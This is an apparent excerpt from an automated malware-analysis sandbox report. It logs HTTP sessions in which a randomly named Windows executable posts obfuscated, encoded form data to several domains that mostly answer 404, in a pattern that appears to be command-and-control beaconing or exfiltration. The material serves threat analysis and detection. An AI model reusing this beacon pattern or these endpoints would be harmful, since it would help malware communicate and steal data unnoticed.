                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          35192.168.2.450042209.74.77.107803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:14:28.102400064 CET10741OUTPOST /fbpt/ HTTP/1.1
                                                                                                                          Host: www.beyondfitness.live
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.beyondfitness.live
                                                                                                                          Content-Length: 10301
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.beyondfitness.live/fbpt/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Raw: 4d 72 36 30 3d 68 46 34 32 56 53 39 4f 45 71 76 58 33 43 2b 6c 49 6a 54 78 73 45 38 7a 4a 62 64 76 43 68 65 32 4b 30 76 75 4e 2b 48 64 54 64 32 75 6b 75 79 58 68 77 6d 53 6b 39 6d 5a 62 38 62 68 4b 61 6a 61 42 75 6f 57 4d 4c 35 4c 58 48 5a 4b 4e 30 63 34 46 42 4b 75 78 30 73 6a 2b 59 33 63 71 70 56 65 43 6e 6c 62 75 6f 51 68 34 58 71 4a 53 43 32 75 73 5a 34 48 4e 59 55 57 69 5a 75 6c 56 70 78 77 34 6a 68 59 66 6f 62 56 4a 47 6f 4f 37 45 4a 58 33 69 44 58 6d 35 4e 30 31 2f 64 79 39 75 75 50 69 71 67 4e 79 39 33 68 72 38 45 6d 57 4b 2f 49 78 55 6f 6e 37 43 4c 66 4c 43 52 2f 6e 4b 48 53 4b 6c 63 62 70 54 79 59 46 68 71 73 62 72 6a 63 42 77 63 4b 66 58 30 38 6e 73 35 6a 5a 36 53 4a 59 49 59 46 70 69 6b 64 6f 4c 36 4f 31 75 42 50 6d 2f 75 50 36 6b 67 55 2b 34 58 78 76 5a 4e 53 55 6e 78 50 47 75 34 53 59 41 4f 6a 4e 4b 41 5a 42 47 4e 6b 6f 2f 58 4c 67 63 78 4b 63 6e 62 42 39 6d 42 56 4d 72 2f 57 31 5a 30 46 75 6e 48 48 39 38 55 32 61 58 62 78 6d 6a 2b 55 64 62 65 73 62 2b 73 70 72 32 4e 6e 50 59 2b 32 6f [TRUNCATED]
                                                                                                                          Data Ascii: Mr60=hF42VS9OEqvX3C+lIjTxsE8zJbdvChe2K0vuN+HdTd2ukuyXhwmSk9mZb8bhKajaBuoWML5LXHZKN0c4FBKux0sj+Y3cqpVeCnlbuoQh4XqJSC2usZ4HNYUWiZulVpxw4jhYfobVJGoO7EJX3iDXm5N01/dy9uuPiqgNy93hr8EmWK/IxUon7CLfLCR/nKHSKlcbpTyYFhqsbrjcBwcKfX08ns5jZ6SJYIYFpikdoL6O1uBPm/uP6kgU+4XxvZNSUnxPGu4SYAOjNKAZBGNko/XLgcxKcnbB9mBVMr/W1Z0FunHH98U2aXbxmj+Udbesb+spr2NnPY+2oG0quqJnX9GFp60w/M+FP3LStbJA+qjZvJm/OoS0Y33mJlZP03MYqEE4EAFNqcAW1czP9PVxh9fKc5CVKS6rk0gX5x2izViJMxznXgPKh+ATOGfT8TqMiEQPF4l9xfylXnmeV35th3ktPhd+qEOIM8wR7AAuVpG/HTUY0kKxPSNBnW3Hex58SWwjAjGcrPnX3PchDHgNfzfHOLua6oE8Gx/NenDUHy0XuzWPVAdS98I8cwj8zSE1AXcZGrbJ3qSO9bBjCozONI4F2OFd1Z9E+15f8rVwjXVUfqjdibWmqXrNGlaAwUO8d2p6/yMcaNb5YEq/zo58wVcKwx66EXyo8HPb+CO1F1wFz0kfZP+LYTjA9xeyx9FpZhS0qcpKwgz24t+WvDhhgI48xpTp8Xan9/DaSMKwzXaHSY4YkfDyWyzkkpUwREuvN6HjfcILLfpH+5R71D1CIDFr0KzaL1xqK1EHXFO2/rFfAkAiLwkaIp1Qx36rHs+Sffq6cJts4VVnGXbeGssP24sALH/GTexKPkI/bUVJKlwxGbeFagU0tBGKa7zXHwF0fRtRT9gz94Oj+6+owASqyOB+7BSv/zWcwn95qDqyfsC2HSNLGCplxSDE77JGXuLph/o/wVnd2Kju/MCspTQqrXCl+NTAFLWeNKmvrN5Blo/n3/j [TRUNCATED]
                                                                                                                          Nov 22, 2024 15:14:29.389961958 CET533INHTTP/1.1 404 Not Found
                                                                                                                          Date: Fri, 22 Nov 2024 14:14:29 GMT
                                                                                                                          Server: Apache
                                                                                                                          Content-Length: 389
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          36192.168.2.450043209.74.77.107803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:14:30.770644903 CET361OUTGET /fbpt/?Mr60=sHQWWiJRbY7Czg+qExT5lhETHbNnMxamWGf9ZvbaXe6zmK6gq2rUy+H9V8T+CpeiS8UyZN5qWlRSJl8kNjqw7URZvJro+8N+ASp2jrUizWujex2cueM/JZ0=&o6=SpTPojpx7H HTTP/1.1
                                                                                                                          Host: www.beyondfitness.live
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-us
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Nov 22, 2024 15:14:31.979356050 CET548INHTTP/1.1 404 Not Found
                                                                                                                          Date: Fri, 22 Nov 2024 14:14:31 GMT
                                                                                                                          Server: Apache
                                                                                                                          Content-Length: 389
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          37192.168.2.45004477.68.64.45803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:14:37.663618088 CET636OUTPOST /dm4p/ HTTP/1.1
                                                                                                                          Host: www.dietcoffee.online
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.dietcoffee.online
                                                                                                                          Content-Length: 201
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.dietcoffee.online/dm4p/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Raw: 4d 72 36 30 3d 71 43 4f 44 55 31 45 62 77 6e 68 67 36 54 53 6e 61 56 70 53 4a 68 7a 31 6d 48 46 67 6a 72 76 75 36 6c 61 66 55 55 2b 67 30 44 67 5a 68 53 6d 51 6c 4d 44 6e 4a 36 33 32 6f 50 2f 36 64 66 61 6f 52 6e 30 50 36 76 69 4b 79 2f 4d 71 33 57 30 43 68 45 67 6e 78 45 4c 73 72 64 74 38 44 33 35 51 4a 49 43 67 38 4d 35 72 61 66 58 35 30 72 6d 6f 4f 4d 45 52 63 33 69 72 2b 43 30 6d 6d 38 36 77 69 39 39 5a 55 4b 32 37 77 39 52 4a 4e 66 49 57 78 59 38 4f 45 46 50 55 46 34 47 73 2f 6f 2f 54 71 30 4e 61 44 34 63 36 32 70 68 72 61 72 74 35 37 49 76 33 6e 58 6a 68 6e 36 6c 50 45 65 31 67 48 67 3d 3d
                                                                                                                          Data Ascii: Mr60=qCODU1Ebwnhg6TSnaVpSJhz1mHFgjrvu6lafUU+g0DgZhSmQlMDnJ632oP/6dfaoRn0P6viKy/Mq3W0ChEgnxELsrdt8D35QJICg8M5rafX50rmoOMERc3ir+C0mm86wi99ZUK27w9RJNfIWxY8OEFPUF4Gs/o/Tq0NaD4c62phrart57Iv3nXjhn6lPEe1gHg==
                                                                                                                          Nov 22, 2024 15:14:38.981838942 CET391INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.25.3
                                                                                                                          Date: Fri, 22 Nov 2024 14:14:38 GMT
                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Content-Encoding: gzip
                                                                                                                          Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 3c c5 ca 5d 16 0d c7 4d 0f f2 13 49 10 89 29 07 8f 98 d6 94 04 28 d2 a2 f1 ed 2d 70 f1 38 3b 33 df 2c ed 92 6b cc ef 55 0a 67 7e 29 a0 aa 4f 45 1e 83 bf 47 cc 53 9e 21 26 3c d9 9c 63 10 22 a6 a5 cf 3c 52 b6 ef 18 29 d9 08 27 6c 6b 3b c9 a2 30 82 52 5b c8 f4 3c 08 c2 ed e8 11 ae 21 7a 68 f1 5d 7a 07 f6 97 71 ca a3 91 71 25 61 92 af 59 1a 2b 05 d4 b7 02 50 f4 d1 88 f0 69 0c 0c 0e f9 5c 90 a0 07 b0 aa 35 60 e4 f4 96 53 40 38 ba 36 ae 60 b7 b2 3c e4 fd 00 14 26 9a 9b cb 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: b3M0<]MI)(-p8;3,kUg~)OEGS!&<c"<R)'lk;0R[<!zh]zqq%aY+Pi\5`S@86`<&0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          38192.168.2.45004577.68.64.45803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:14:40.334255934 CET656OUTPOST /dm4p/ HTTP/1.1
                                                                                                                          Host: www.dietcoffee.online
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.dietcoffee.online
                                                                                                                          Content-Length: 221
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.dietcoffee.online/dm4p/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Raw: 4d 72 36 30 3d 71 43 4f 44 55 31 45 62 77 6e 68 67 34 7a 69 6e 4a 6d 52 53 49 42 7a 32 37 33 46 67 6f 4c 76 69 36 6c 57 66 55 56 36 77 30 51 55 5a 6d 78 79 51 33 39 44 6e 49 36 33 32 67 76 2f 37 51 2f 61 76 52 6e 34 70 36 72 71 4b 79 2b 6f 71 33 54 59 43 69 7a 4d 6b 78 55 4c 35 71 74 74 79 4d 58 35 51 4a 49 43 67 38 49 6f 38 61 66 50 35 31 62 32 6f 4f 74 45 51 66 33 69 73 32 69 30 6d 33 73 36 4f 69 39 39 33 55 4a 7a 75 77 2f 70 4a 4e 66 34 57 79 4b 45 4a 54 56 50 6f 42 34 48 46 2b 34 32 72 73 45 55 33 43 4c 35 65 72 71 31 4d 62 74 67 6a 71 35 4f 67 31 58 48 53 36 39 73 37 4a 64 49 70 63 74 50 49 31 36 4d 58 6a 58 39 58 53 36 6c 68 4c 34 6a 5a 34 4c 51 3d
                                                                                                                          Data Ascii: Mr60=qCODU1Ebwnhg4zinJmRSIBz273FgoLvi6lWfUV6w0QUZmxyQ39DnI632gv/7Q/avRn4p6rqKy+oq3TYCizMkxUL5qttyMX5QJICg8Io8afP51b2oOtEQf3is2i0m3s6Oi993UJzuw/pJNf4WyKEJTVPoB4HF+42rsEU3CL5erq1Mbtgjq5Og1XHS69s7JdIpctPI16MXjX9XS6lhL4jZ4LQ=
                                                                                                                          Nov 22, 2024 15:14:41.596782923 CET391INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.25.3
                                                                                                                          Date: Fri, 22 Nov 2024 14:14:41 GMT
                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Content-Encoding: gzip
                                                                                                                          Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 3c c5 ca 5d 16 0d c7 4d 0f f2 13 49 10 89 29 07 8f 98 d6 94 04 28 d2 a2 f1 ed 2d 70 f1 38 3b 33 df 2c ed 92 6b cc ef 55 0a 67 7e 29 a0 aa 4f 45 1e 83 bf 47 cc 53 9e 21 26 3c d9 9c 63 10 22 a6 a5 cf 3c 52 b6 ef 18 29 d9 08 27 6c 6b 3b c9 a2 30 82 52 5b c8 f4 3c 08 c2 ed e8 11 ae 21 7a 68 f1 5d 7a 07 f6 97 71 ca a3 91 71 25 61 92 af 59 1a 2b 05 d4 b7 02 50 f4 d1 88 f0 69 0c 0c 0e f9 5c 90 a0 07 b0 aa 35 60 e4 f4 96 53 40 38 ba 36 ae 60 b7 b2 3c e4 fd 00 14 26 9a 9b cb 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: b3M0<]MI)(-p8;3,kUg~)OEGS!&<c"<R)'lk;0R[<!zh]zqq%aY+Pi\5`S@86`<&0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          39192.168.2.45004677.68.64.45803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:14:43.013545990 CET10738OUTPOST /dm4p/ HTTP/1.1
                                                                                                                          Host: www.dietcoffee.online
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.dietcoffee.online
                                                                                                                          Content-Length: 10301
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.dietcoffee.online/dm4p/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Raw: 4d 72 36 30 3d 71 43 4f 44 55 31 45 62 77 6e 68 67 34 7a 69 6e 4a 6d 52 53 49 42 7a 32 37 33 46 67 6f 4c 76 69 36 6c 57 66 55 56 36 77 30 51 4d 5a 68 44 71 51 6c 75 62 6e 61 71 33 32 2f 66 2f 32 51 2f 61 2b 52 6e 51 74 36 72 6e 33 79 39 41 71 78 78 51 43 6a 42 30 6b 69 30 4c 35 68 4e 74 2f 44 33 34 4e 4a 4a 75 6b 38 4d 4d 38 61 66 50 35 31 64 61 6f 61 73 45 51 54 58 69 72 2b 43 30 36 6d 38 36 31 69 39 6c 42 55 4b 65 56 77 4c 56 4a 4e 37 63 57 2b 5a 38 4a 4d 6c 50 75 47 34 48 64 2b 34 71 30 73 45 49 56 43 4b 63 37 72 72 4e 4d 5a 4d 46 38 76 37 2b 70 6b 47 79 42 69 73 34 46 4f 74 49 63 51 74 72 54 32 72 4e 58 68 54 4e 70 51 71 38 53 57 36 66 34 70 2b 53 6c 69 39 4c 46 6a 4b 70 47 44 41 6b 57 43 77 43 4a 32 30 36 49 77 42 48 72 37 31 4c 35 6b 35 61 73 63 4b 70 51 4f 56 35 2f 67 56 54 61 57 30 46 66 58 6d 6b 7a 47 4a 6d 75 4b 6f 38 41 73 48 72 41 33 71 41 4f 55 43 72 33 57 50 4d 63 78 75 34 73 38 30 64 75 46 2f 48 78 4a 47 76 37 4a 2b 4c 31 32 79 4e 75 48 79 6a 45 41 78 42 32 54 38 4a 53 67 56 4b 7a 53 [TRUNCATED]
                                                                                                                          Data Ascii: Mr60=qCODU1Ebwnhg4zinJmRSIBz273FgoLvi6lWfUV6w0QMZhDqQlubnaq32/f/2Q/a+RnQt6rn3y9AqxxQCjB0ki0L5hNt/D34NJJuk8MM8afP51daoasEQTXir+C06m861i9lBUKeVwLVJN7cW+Z8JMlPuG4Hd+4q0sEIVCKc7rrNMZMF8v7+pkGyBis4FOtIcQtrT2rNXhTNpQq8SW6f4p+Sli9LFjKpGDAkWCwCJ206IwBHr71L5k5ascKpQOV5/gVTaW0FfXmkzGJmuKo8AsHrA3qAOUCr3WPMcxu4s80duF/HxJGv7J+L12yNuHyjEAxB2T8JSgVKzS1RwAipKQByU16or1GqgRQc/jXpEKjNf2WFAFtrfci0eN3AOXefX93tMS78MoAPP5apdFM+AwfEWlw/auOCKqfCLvHXR1FO0g3JrdXm/x+kt4DxGhuT5wURzJBi1XZYI6ykAPS2oTCFeO0a2UG3HknnvuA0khje/QBYHOXRrjFLocr+v1xUEDIxOO5kYyNMceHti9VZrm4eu3SRnMeZg9gdAtrLZ1daG67MwLDvxb9JcdYLGNFFwPBP1ohOjFiCuAv42sLTVUu/3oVnhIiKrt3wfnCKTEfRZnmmw2jRVLuxS0zuJ8yFgYQq4LhlDOzJ4wV4VRMNImDay/zbaqJpSNR1jYHyrK2iGwfUdlIJQyzquJNScZRRRq2Mt8d3uFmwBRyZMtscBxAyPcpwYOVlPn7ul/5TsfVTFD7Yt29g6l7XntxlTrWkPtr0DXAVu48qD++DbUeN+O04cwzrYPKW0ZNRvgvIeKJV3sHZmCSVObVlm1DQR2UP9fedfG3x9XBb4yJH0PRuhRG2ZG8cHTZxiPe9XOPWfs58g5so1DC8H2g6GBjAL/4yp/6vHjq+iL+CGbzw7gNPHNrB0xZlxBRufYTf1tFlbdX6gQG2TaSqXXsBqvEhHzMD3Tnpnd66QvsS+w53RxzfQu8YEtM7RGrXt/Pl7VdpRxVPsW1N [TRUNCATED]
                                                                                                                          Nov 22, 2024 15:14:44.365354061 CET391INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.25.3
                                                                                                                          Date: Fri, 22 Nov 2024 14:14:44 GMT
                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Content-Encoding: gzip
                                                                                                                          Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 3c c5 ca 5d 16 0d c7 4d 0f f2 13 49 10 89 29 07 8f 98 d6 94 04 28 d2 a2 f1 ed 2d 70 f1 38 3b 33 df 2c ed 92 6b cc ef 55 0a 67 7e 29 a0 aa 4f 45 1e 83 bf 47 cc 53 9e 21 26 3c d9 9c 63 10 22 a6 a5 cf 3c 52 b6 ef 18 29 d9 08 27 6c 6b 3b c9 a2 30 82 52 5b c8 f4 3c 08 c2 ed e8 11 ae 21 7a 68 f1 5d 7a 07 f6 97 71 ca a3 91 71 25 61 92 af 59 1a 2b 05 d4 b7 02 50 f4 d1 88 f0 69 0c 0c 0e f9 5c 90 a0 07 b0 aa 35 60 e4 f4 96 53 40 38 ba 36 ae 60 b7 b2 3c e4 fd 00 14 26 9a 9b cb 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: b3M0<]MI)(-p8;3,kUg~)OEGS!&<c"<R)'lk;0R[<!zh]zqq%aY+Pi\5`S@86`<&0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          40192.168.2.45004777.68.64.45803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:14:45.674417973 CET360OUTGET /dm4p/?o6=SpTPojpx7H&Mr60=nAmjXBwFyC120iWGDF5QEkfQ4V9pq4qW/X6vA0SQviJnmQOR7pbzII6Li/fXSuLSC3cdwp3L3c1awzkuuw4A1F2MgfpbEGtSAoSHmNs0Z+rY9P6APqFlZ34= HTTP/1.1
                                                                                                                          Host: www.dietcoffee.online
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-us
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Nov 22, 2024 15:14:46.997927904 CET373INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.25.3
                                                                                                                          Date: Fri, 22 Nov 2024 14:14:46 GMT
                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                          Content-Length: 203
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 6d 34 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dm4p/ was not found on this server.</p></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          41192.168.2.450048146.88.233.115803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:14:53.440560102 CET636OUTPOST /qtfx/ HTTP/1.1
                                                                                                                          Host: www.smartcongress.net
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.smartcongress.net
                                                                                                                          Content-Length: 201
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.smartcongress.net/qtfx/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Raw: 4d 72 36 30 3d 48 66 6c 45 38 6c 2b 2b 76 34 34 48 74 4b 51 7a 7a 35 2b 2f 7a 47 4b 54 7a 79 69 58 61 43 6a 56 36 42 4a 4d 70 73 44 56 30 4d 6d 31 73 6d 46 71 38 6a 6d 49 6b 4a 4a 74 59 44 6a 47 4d 58 36 72 71 73 32 77 43 72 5a 56 57 70 70 42 77 6f 68 6a 78 6f 4f 76 48 30 36 65 66 6a 75 33 4a 45 39 68 4f 57 35 70 66 39 45 6d 69 31 64 48 32 56 4f 6c 6c 39 56 71 67 6a 58 52 72 63 58 71 64 76 32 73 74 4b 6c 30 76 6c 32 67 57 43 35 72 62 70 43 52 59 6b 33 35 4f 6a 2b 35 45 48 35 34 4f 49 38 34 35 59 67 35 65 2f 6b 31 54 58 4b 47 50 53 4a 4e 57 67 79 71 33 63 31 55 44 6c 61 2f 58 72 5a 2b 36 41 3d 3d
                                                                                                                          Data Ascii: Mr60=HflE8l++v44HtKQzz5+/zGKTzyiXaCjV6BJMpsDV0Mm1smFq8jmIkJJtYDjGMX6rqs2wCrZVWppBwohjxoOvH06efju3JE9hOW5pf9Emi1dH2VOll9VqgjXRrcXqdv2stKl0vl2gWC5rbpCRYk35Oj+5EH54OI845Yg5e/k1TXKGPSJNWgyq3c1UDla/XrZ+6A==
                                                                                                                          Nov 22, 2024 15:14:55.008775949 CET380INHTTP/1.1 404 Not Found
                                                                                                                          content-type: text/html; charset=iso-8859-1
                                                                                                                          content-length: 196
                                                                                                                          date: Fri, 22 Nov 2024 14:14:54 GMT
                                                                                                                          server: LiteSpeed
                                                                                                                          x-tuned-by: N0C
                                                                                                                          connection: close
